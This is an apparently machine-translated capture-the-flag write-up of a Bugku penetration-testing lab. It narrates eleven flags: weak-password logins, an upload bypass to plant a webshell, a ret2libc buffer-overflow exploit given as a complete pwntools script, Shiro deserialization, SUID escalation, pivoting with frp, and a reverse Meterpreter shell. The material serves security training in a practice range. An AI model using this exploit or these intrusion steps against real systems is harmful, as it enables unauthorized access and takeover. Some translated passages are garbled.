foreword
Bugku’s PAR mode, Penetration Test 1, has a total of 11 flags. After playing it many times, it lasted four days, and finally only took 10 flags (the last one was made by wp). The whole shooting process was very bumpy. Here, I share the author's process and present my own thinking, and hope to get the advice of the big guys.
process
first time shooting
0x01 flag1(F12)
Start the scene, give an ip, first go to nmap to scan a wave of services
Four ports are opened, starting from port 80, and the access page shows that you
go to Yujian to scan first. When you come across this kind of site, let’s familiarize yourself with the specific functions first, click casually, and flip through the source code of the page. As expected, you can see it at the bottom of the page. flag
0x02 flag2 (weak password)
According to the prompt given by the previous flag, look at the results of Yujian's scan
It is estimated that you need to log in as an administrator user. Add admin after the url to access the background, prompting you to log in first, and then
jump to the background login interface
. Facing the background login interface, the common idea is to try a weak password and flip through the page Source code, look for unauthorized js interface, forget the password, click to see, etc., first try the weak password, admin/admin, once you send it to the soul,
find flag2 in the basic settings
0x03 flag3 (double write bypass getshell)
Our favorite way to use getshell is to upload files. After looking through the functions of the background management interface, we found that the logo can be uploaded in the basic settings.
Although there is a whitelist, you can change it by yourself.
After adding the php suffix to the upload suffix and submitting it, the burpsuit began to capture the package and tried to launch it. The
returned package showed "The suffix of the uploaded file cannot be empty", and found that it filtered the php suffix, and
double wrote php Try to bypass, successful
browser access, Ice Scorpion connection, according to the prompt "/home" behind flag2, jump to the home directory to get the flag
0x04 flag4 (weak database password)
According to the prompt of the previous flag, go to the database to have a look, try the mysql default username and password root/root and then connect, the first thing to bear the brunt is the flag table in the flag database, just read it directly and you’re done
0x05 flag5 (pwn buffer overflow)
According to the prompt of the title and the prompt of the previous flag, go to the home/ctf directory and find the main file.
Take it out and look at it. It is a 32-bit executable file.
Drag it to IDA32 and F5 to look at the pseudo code.
The initial judgment should be It's a pwn question, and it's a buffer overflow type, but as a novice web player, I don't know anything about pwn, so I definitely won't do it, so the first shooting is over.
second shot
0x05 flag5 (pwn buffer overflow)
After three days of suffering from the pwn tutorial, I tremblingly embarked on the second shooting process.
This time I saw the pseudo code of the main file, and I saw at a glance that there must be an overflow problem in the vul function (nonsense , haha), as a buffer overflow vulnerability, there are many types, ret2text, ret2shellcode, ret2syscall, ret2libc, how to judge which type of buffer overflow this question belongs to?
一般来讲pwn题的思路
1.没有NX保护,程序源码自带系统命令函数,找到系统命令函数的地址,使用ret2text,直接覆盖返回地址即可
2.没有NX保护,找不到system函数,利用输入函数,将shellcode写入到程序中,将shellcode的地址覆盖返回地址即可:ret2shellcode
3.有NX保护,利用ROPGadget配合int 0x80调用execve,调用系统函数:ret2syscall
4.有NX保护,利用libc获取system函数的相对位置:ret2libc
It's actually very clear when you look at it this way, let's go to checksec
You can see that the main file has enabled the NX protection mechanism. What is the NX protection mechanism?
NX即No-execute,不可执行的意思,基本原理是将数据所在内存页标识为不可执行,也就是数据不可执行,防止因为程序运行出现溢出而使得攻击者的shellcode可能会在数据区尝试执行的情况。
According to the information obtained above, we already know that this is a ret2libc type of question, so how to do this kind of question?
1、泄露一个ret2libe3函数的位置
2、获取libc的版本(只有被执行过的函数才能获取地址)
LibcSearcher: https://github.com/lieanu/LibcSearcher
https://ibc.blukat.me
3、根据偏移获取shell和sh的位置
求libc基地址(函数动态地址-函数偏移量)
求其他函数地址(基地址+函数偏移量)
4、执行程序获取shell
The purpose is clear and the thinking is clear. After that, I pulled a pwndocker image, started gdb debugging, directly cyclically generated a large string of characters, input them, and then the program will report an error.
Then through cyclic, you can calculate the distance from the buffer to the return address as 40. Take a look at
the gadget, because the write function is used and parameters are passed to it. After the parameters are pushed onto the stack, they must be popped out of the stack. Pop out the three wirte parameters, and finally ret returns to the address of the main function to start re-executing, so use the third last one
and then start writing exp
from pwn import *
from LibcSearcher import *
p = remote('xx.xx.xx.xx',9999) #远程
#p = process('./main') #本地
elf = ELF('./main')
#创建一个文件对象
start_addr = elf.symbols['_start']
write_plt = elf.plt['write']
#需要被泄露的函数地址
write_got = elf.got['write']
ppp_ret = 0x08048559 #gadget
offset = 40
#返回地址与缓冲区的距离
payload = b'A'*offset + p32(write_plt) + p32(ppp_ret) + p32(1)\
+ p32(write_got) + p32(8) + p32(start_addr)
p.sendlineafter('plz input your name:\n',payload)
write_addr = u32(p.recv(4))
#获取write函数的真实地址
libc = LibcSearcher('write',write_addr)
#查找属于哪个libc库
libc_base = write_addr - libc.dump('write')
#获取libc的基址,计算出其他函数的地址
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
payload = b'A'*offset +p32(system_addr) + b'a'*4 + p32(binsh_addr)
#偏移长度+system函数地址+system返回地址+binsh的地址
p.sendlineafter('plz input your name:\n',payload)
p.interactive()
Run python, choose the third one, get the shell and get the flag
0x06 flag6 (directory scan)
Access port 8080 according to the prompt in the previous question,
A login interface, as usual, first scan the directory, I flipped through the source code of the page, tried a weak password, but failed, and finally looked at the results of Yujian’s scan,
visited robots.txt, and the flag came out
0x07 flag7 (shiro deserialization)
According to the hint in the previous question, it is shiro, and the burpsuit captures the bag, and it is an obvious feature
Direct shiro tool a shuttle,
successfully won the flag
0x08 flag8 (suid privilege escalation)
The title does not give any hints, and the normal process should require me to elevate the rights. Although the authority obtained in the previous pwn question is root, it seems that it is not the same machine. It is estimated that the port service is provided by the machine on the intranet Mapped to this server on the public network,
it may be more convenient to play a shell for it to return to the operation, but it still can’t be played back, maybe it’s because I’m not going out of the Internet cafe to
honestly raise the rights first, I will only Three tricks, suid, sudo -l look at sudoer plus kernel privilege escalation, first look at suid
Then put it on GTFOBins to find the corresponding command and found that only find met the requirements,
so I used find to escalate the privilege, executed the find command, and successfully got the flag
0x09 flag9 (intranet)
Look at the intranet according to the prompt,
Use the shiro tool command to execute ifconfig to look at the network segment, but it can’t be echoed all the time,
and then the time is almost up, so the second shooting ended
third shot
0x09 flag9 (intranet)
Here is a brief review. At present, we have obtained three shells, a shell obtained by a file upload Trojan; a shell obtained by pwn; a shell obtained by Shiro deserialization; try,
This time I will directly look at the commands. The good guy comes with nmap, and wget
nmap scans directly (it is best to save the scan results to a file, and then read the results from the file), and found that there are four The machine
uses wget to download the full set of frp from the public network vps, then opens a Sock5 proxy, and then visits each IP port, and finds that only the web site of this machine is 192.168.0.4, which has not been seen before. Look at the upper left
corner Familiar small icons, tp framework, random input of url, website error, see tp framework version 5.0.20,
this version can be executed by code, directly write a sentence Trojan
Horse Ant Sword (also hang the proxy), under the root directory of the website get the flag
0x10 flag10 (database)
The last flag prompts the database, first look at the configuration file of the site
(Suddenly remembered that flag4 before, should also go to the website configuration file to get the database account password, but I was lucky, and I tried the default password directly, haha, now add a screenshot of flag4) Try to connect to mysql, but it doesn’t
work Let it execute,
I want to see if this machine can go out of the network, but I can’t ping it, so
I will default to this machine not going out of the network, I need to hang a secondary proxy, and this machine also has wget, port 3306 to 192.168. 0.2 on this machine, but when the second-level agent was connected, there was always a port problem, which
took a long time, and finally frp was not connected, and the time was up, and the third time ended like this
fourth shot
0x10 flag10 (database)
After reopening the shooting range this time, because the second-level agent really couldn't hang up, I assumed it would be able to get out of the net with a fluke mentality, but after a try, the good guy really could get out of the net! Port 3306 was exposed on my public network vps, and I connected directly to Navicat, still a familiar flag
0x11 flag11 (privilege escalation)
According to the prompt of the previous flag, it is obvious to escalate the authority, look for commands with suid authority, no; look at sudo -l, then look at the scheduled tasks, as well as the operating system and kernel version
The 64-bit linux 3.0.10 of the ubuntu system
is as fierce as a tiger. I tried several kernel privilege escalation scripts, but it was useless
. The prompt is that the sudo version found that there is a privilege escalation vulnerability (CVE-2021-3156) in 1.8.31. I
have tried this cve script many times, but the privilege escalation is still unsuccessful. The ant sword and ice scorpion are not working. I don’t understand the specific reason. It is said that it is an echo The reason for this is that
I sent an Ice Scorpion horse at the end, and bounced the shell from the Ice Scorpion into a Metepreter to the vps (the one with the interface is more comfortable to use than the command line), and then execute it with the shell to be considered successful.
Summarize
It's over here, and finally review the whole process and find that in fact, many places can simplify the operation without doing so much useless work, which is harmful. Although the process was difficult, I still learned a lot from it and had a lot of feelings (it’s because I am addicted to cooking haha, this mode is very fun and I will continue next time). I hope the masters don't like it, thank you.